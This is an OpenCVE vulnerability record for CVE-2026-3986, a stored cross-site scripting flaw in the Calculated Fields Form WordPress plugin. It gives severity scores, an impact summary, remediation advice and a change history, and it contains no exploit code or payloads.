Description
The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form settings in all versions up to, and including, 5.4.5.0. This is due to insufficient capability checks on the form settings save handler and insufficient input sanitization of the `fcontent` field in `fhtml` field types. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2026-03-13
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting
Action: Patch Immediately
AI Analysis

Impact

The Calculated Fields Form plugin for WordPress has a stored cross‑site scripting flaw caused by missing capability checks on the form settings save handler and unsanitized input of the fcontent field in fhtml field types. The vulnerability allows an authenticated user with Contributor level access or higher to inject arbitrary JavaScript, which is stored and subsequently executed whenever a page containing the injected form is loaded in a visitor’s browser. This can lead to session hijacking, defacement, or other browser‑side attacks that compromise the confidentiality and integrity of the site’s data.

Affected Systems

Any WordPress installation that runs CodePeople’s Calculated Fields Form plugin version 5.4.5.0 or earlier is affected. The flaw is present in all releases up to and including 5.4.5.0, as confirmed by the plugin’s source code for versions 5.4.4.5 and older.

Risk and Exploitability

The CVSS v3.1 score of 6.4 indicates medium severity, and the EPSS score of less than 1% suggests a low probability of exploitation. The vulnerability is not listed in the CISA KEV catalog. Exploitation requires authenticated access with Contributor–level privileges or higher, meaning an insider or a compromised contributor account is the most likely attacker. Overall, the risk is moderate, but the impact could be significant if an attacker can execute script in visitors’ browsers.

Generated by OpenCVE AI on March 19, 2026 at 17:52 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Calculated Fields Form to any version newer than 5.4.5.0.
  • If an upgrade cannot be performed immediately, restrict Contributor and lower‑level roles from accessing the plugin’s settings page or remove those permissions.
  • As a last resort, disable or uninstall the Calculated Fields Form plugin until a patched version is available.

Generated by OpenCVE AI on March 19, 2026 at 17:52 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Mon, 16 Mar 2026 10:15:00 +0000

Type Values Removed Values Added
First Time appeared Codepeople
Codepeople calculated Fields Form
Wordpress
Wordpress wordpress
Vendors & Products Codepeople
Codepeople calculated Fields Form
Wordpress
Wordpress wordpress

Fri, 13 Mar 2026 17:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 13 Mar 2026 08:45:00 +0000

Type Values Removed Values Added
Description The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form settings in all versions up to, and including, 5.4.5.0. This is due to insufficient capability checks on the form settings save handler and insufficient input sanitization of the `fcontent` field in `fhtml` field types. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Title Calculated Fields Form <= 5.4.5.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Form Settings
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}

Subscriptions

Codepeople Calculated Fields Form
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-03-13T16:03:46.416Z

Reserved: 2026-03-11T14:57:10.292Z

Link: CVE-2026-3986

cve-icon Vulnrichment

Updated: 2026-03-13T16:03:41.432Z

cve-icon NVD

Status : Awaiting Analysis

Published: 2026-03-13T19:55:12.937

Modified: 2026-03-16T14:53:46.157

Link: CVE-2026-3986

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-03-23T09:59:38Z

Weaknesses